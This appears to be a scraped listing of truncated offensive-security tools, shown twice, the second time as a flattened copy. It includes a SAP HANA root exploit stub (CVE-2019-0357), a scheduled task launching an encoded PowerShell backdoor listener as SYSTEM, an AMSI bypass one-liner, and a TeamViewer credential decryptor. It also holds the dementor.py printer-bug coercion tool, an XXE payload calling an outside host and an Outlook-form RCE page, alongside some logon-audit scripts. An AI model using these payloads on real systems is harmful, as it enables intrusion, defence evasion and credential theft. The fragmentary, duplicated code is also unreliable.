S3cur3Th1sSh1t

## Teamviewer_Decrypt.py
import sys, hexdump, binascii
from Crypto.Cipher import AES

class AESCipher:
    def __init__(self, key):
        self.key = key

    def decrypt(self, iv, data):
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)

## CVE-2019-0357 - SAP-HANA root
import os
import signal
import sys

ATTEMPTS = (100 * 1000)

bin2exec = "/usr/sap/HXE/HDB90/exe/mdc/hdbmdcdispatcher"
socketfn = "/var/lib/hdb/HXE/ipc/hdbmdcdispatcher"

passwd_entry = b"anvil:x:0:0:Anvil Ventures:/root:/bin/bash"

## DC_Logons.ps1
# Find DC list from Active Directory
$DCs = Get-ADDomainController -Filter *

# Define time for report (default is 1 day)
$startDate = (get-date).AddDays(-1)

# Store successful logon events from security logs with the specified dates and workstation/IP in an array
foreach ($DC in $DCs){
$slogonevents = Get-Eventlog -LogName Security -ComputerName $DC.Hostname -after $startDate | where {$_.eventID -eq 4624 }}

## LastLogons.ps1
$Days = 1
$events = @()
$events += Get-WinEvent -FilterHashtable @{
    LogName='Security'
    Id=@(4800,4801)
    StartTime=(Get-Date).AddDays(-$Days)
}
$events += Get-WinEvent -FilterHashtable @{
    LogName='System'
    Id=@(7000,7001)

## UserLogonEvents.ps1
$computers = Get-ADComputer -Filter *
$startDate = (get-date).AddDays(-1)
Write-Host "Please enter the username to search for logon events:"
$username = Read-Host
foreach ($computer in $computers)
{
    $Computernames += $computers.DNSHostName
}

foreach ($System in $Computernames){

## SystemShell.ps1
$confirmpreference = "none"
function Get-ScheduledTaskSystem
{
    $Name = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})
    $SystemUser = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount
    $action = New-ScheduledTaskAction -Execute "powershell" -Argument " -noni -noP -sta -enc JABlAGEAcwB5AGIAaQBuAGQAIAA9ACAAQAAiAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0ADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBJAE8AOwAKAG4AYQBtAGUAcwBwAGEAYwBlACAAQgBhAGMAawBkAG8AbwByAFMAZQByAHYAZQByAAoAewAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABCAGEAYwBrAGQAbwBvAHIACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAcAByAGkAdgBhAHQAZQAgAFQAYwBwAEwAaQBzAHQAZQBuAGUAcgAgAGwAaQBzAHQAZQBuAGUAcgA7AAoAIAAgACAAIAAgACAAIAAgAHAAcgBpAHYAYQB0AGUAIABTAG8AYwBrAGUAdAAgAG0AYQBpAG

## dementor.py
#!/usr/bin/env python
# originally by 3xocyte, modified by agsolino after native MS-RPRN functionality was added to impacket
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/

import os
import sys
import argparse
import binascii
import ConfigParser

## PoC.ps1
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

## XXE_Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## RulerRCE
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
 Sub window_onload()
     Set Application = ViewCtl1.OutlookApplication
     Set cmd = Application.CreateObject("Wscript.Shell")
	import sys, hexdump, binascii
	from Crypto.Cipher import AES

	class AESCipher:
	def __init__(self, key):
	self.key = key

	def decrypt(self, iv, data):
	self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
	return self.cipher.decrypt(data)
	import os
	import signal
	import sys

	ATTEMPTS = (100 * 1000)

	bin2exec = "/usr/sap/HXE/HDB90/exe/mdc/hdbmdcdispatcher"
	socketfn = "/var/lib/hdb/HXE/ipc/hdbmdcdispatcher"

	passwd_entry = b"anvil:x:0:0:Anvil Ventures:/root:/bin/bash"
	# Find DC list from Active Directory
	$DCs = Get-ADDomainController -Filter *

	# Define time for report (default is 1 day)
	$startDate = (get-date).AddDays(-1)

	# Store successful logon events from security logs with the specified dates and workstation/IP in an array
	foreach ($DC in $DCs){
	$slogonevents = Get-Eventlog -LogName Security -ComputerName $DC.Hostname -after $startDate \| where {$_.eventID -eq 4624 }}
	$Days = 1
	$events = @()
	$events += Get-WinEvent -FilterHashtable @{
	LogName='Security'
	Id=@(4800,4801)
	StartTime=(Get-Date).AddDays(-$Days)
	}
	$events += Get-WinEvent -FilterHashtable @{
	LogName='System'
	Id=@(7000,7001)
	$computers = Get-ADComputer -Filter *
	$startDate = (get-date).AddDays(-1)
	Write-Host "Please enter the username to search for logon events:"
	$username = Read-Host
	foreach ($computer in $computers)
	{
	$Computernames += $computers.DNSHostName
	}

	foreach ($System in $Computernames){
	$confirmpreference = "none"
	function Get-ScheduledTaskSystem
	{
	$Name = -join ((65..90) + (97..122) \| Get-Random -Count 5 \| % {[char]$_})
	$SystemUser = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount
	$action = New-ScheduledTaskAction -Execute "powershell" -Argument " -noni -noP -sta -enc JABlAGEAcwB5AGIAaQBuAGQAIAA9ACAAQAAiAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0ADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBJAE8AOwAKAG4AYQBtAGUAcwBwAGEAYwBlACAAQgBhAGMAawBkAG8AbwByAFMAZQByAHYAZQByAAoAewAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABCAGEAYwBrAGQAbwBvAHIACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAcAByAGkAdgBhAHQAZQAgAFQAYwBwAEwAaQBzAHQAZQBuAGUAcgAgAGwAaQBzAHQAZQBuAGUAcgA7AAoAIAAgACAAIAAgACAAIAAgAHAAcgBpAHYAYQB0AGUAIABTAG8AYwBrAGUAdAAgAG0AYQBpAG
	#!/usr/bin/env python
	# originally by 3xocyte, modified by agsolino after native MS-RPRN functionality was added to impacket
	# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
	# some code from https://www.exploit-db.com/exploits/2879/

	import os
	import sys
	import argparse
	import binascii
	import ConfigParser
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	<html>
	<head>
	<meta http-equiv="Content-Language" content="en-us">
	<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
	<title>Outlook</title>
	<script id=clientEventHandlersVBS language=vbscript>
	<!--
	Sub window_onload()
	Set Application = ViewCtl1.OutlookApplication
	Set cmd = Application.CreateObject("Wscript.Shell")